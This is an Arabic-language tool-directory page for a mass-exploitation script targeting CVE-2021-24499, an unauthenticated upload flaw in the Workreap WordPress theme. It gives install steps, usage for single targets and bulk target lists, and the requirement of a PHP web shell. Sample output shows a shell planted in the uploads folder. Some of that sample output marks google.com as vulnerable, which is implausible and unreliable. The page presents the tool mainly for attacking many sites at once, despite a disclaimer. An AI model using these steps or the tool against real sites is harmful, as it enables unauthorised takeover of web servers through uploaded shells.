Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-24499 — قالب ووردبريس Workreap 2.2.2 - رفع بدون مصادقة يؤدي إلى تنفيذ كود عن بُعد | Kitploit
أدوات/GitHubGitHub/jayhutajulu1/cve-2021-24499
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

قالب ووردبريس Workreap 2.2.2 - رفع بدون مصادقة يؤدي إلى تنفيذ كود عن بُعد

عرض المستودع
5منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-24499 | Workreap - سوق العمل الحر والدليل قالب ووردبريس < 2.2.2 - رفع ملفات تعسفي

CVE License Shell

قالب ووردبريس Workreap 2.2.2 - رفع ملفات غير مصادق عليه يؤدي إلى تنفيذ كود عن بُعد

أداة استغلال قوية ودقيقة للاستغلال الجماعي لثغرة CVE-2021-24499 في قالب Workreap لووردبريس. يتيح هذا الاستغلال رفع ملفات غير مصادق عليه مما قد يؤدي إلى تنفيذ كود عن بُعد (RCE).

📝 الوصف

CVE-2021-24499 هي ثغرة حرجة في قالب ووردبريس Workreap (الإصدار 2.2.2 وما دون) تسمح للمستخدمين غير المصادق عليهم برفع ملفات تعسفية، بما في ذلك ملفات PHP، عبر إجراء AJAX الخاص بـ workreap_award_temp_file_uploader. يمكن أن يؤدي هذا إلى تنفيذ كود عن بُعد (RCE) على الخادم المستهدف.

الإصدارات المعرضة للخطر: جميع الإصدارات حتى 2.2.2 وما يشملها

درجة CVSS: حرجة

📦 المتطلبات

  • قشرة Bash (Linux/macOS/WSL)
  • أداة سطر الأوامر curl
  • ملف opts.php أو shell.php (قشرة ويب PHP)

🔧 التثبيت

  1. استنساخ هذا المستودع:
git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
  1. اجعل السكربت قابلاً للتنفيذ:
chmod +x exploit.sh
  1. تأكد من وجود opts.php أو shell.php في نفس الدليل (قشرة الويب PHP الخاصة بك)

🚀 الاستخدام

الاستخدام الأساسي

هدف واحد:

./exploit.sh -u http://target.com

أهداف متعددة (من ملف):

./exploit.sh -l targets.txt

إظهار المساعدة:

./exploit.sh --help

خيارات سطر الأوامر

الخيارالوصف
-u URLاستغلال هدف واحد عبر عنوان URL
-l FILEاستغلال أهداف متعددة من ملف (عنوان URL واحد في كل سطر)
--helpإظهار قائمة المساعدة

تنسيق ملف الأهداف

أنشئ ملفًا نصيًا يحتوي على عنوان URL واحد في كل سطر:

http://target1.com
https://target2.com
http://target3.com

📸 أمثلة

المثال 1: استغلال هدف واحد

$ ./exploit.sh -u https://domain.com

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com/ >> VULNERABLE! 
 --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php

المثال 2: الاستغلال الجماعي

$ ./exploit.sh -l targets.txt

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!

⚠️ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية والاختبار المصرح به فقط.

  • لا تستخدم هذه الأداة على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها
  • لا تستخدم هذه الأداة في أي أنشطة غير قانونية
  • المؤلفون والمساهمون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
  • تأكد دائمًا من حصولك على التفويض المناسب قبل اختبار أي نظام
  • استخدمها بمسؤولية وأخلاقية

باستخدامك لهذه الأداة، فإنك توافق على استخدامها فقط لأغراض اختبار الأمان والبحث المشروعة.

🔗 المراجع

  • Exploit-DB
  • Wordfence
  • WP-Scan

👤 الاعتمادات

المؤلف: Jay Maranatha Hutajulu

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

🤝 المساهمة

المساهمات والقضايا وطلبات الميزات مرحب بها! لا تتردد في زيارة صفحة القضايا.

⭐ تاريخ النجوم

إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة ⭐


تذكير: استخدم دائمًا أدوات الأمان بمسؤولية وأخلاقية. اختبار سعيد! 🚀

تنزيل الأداة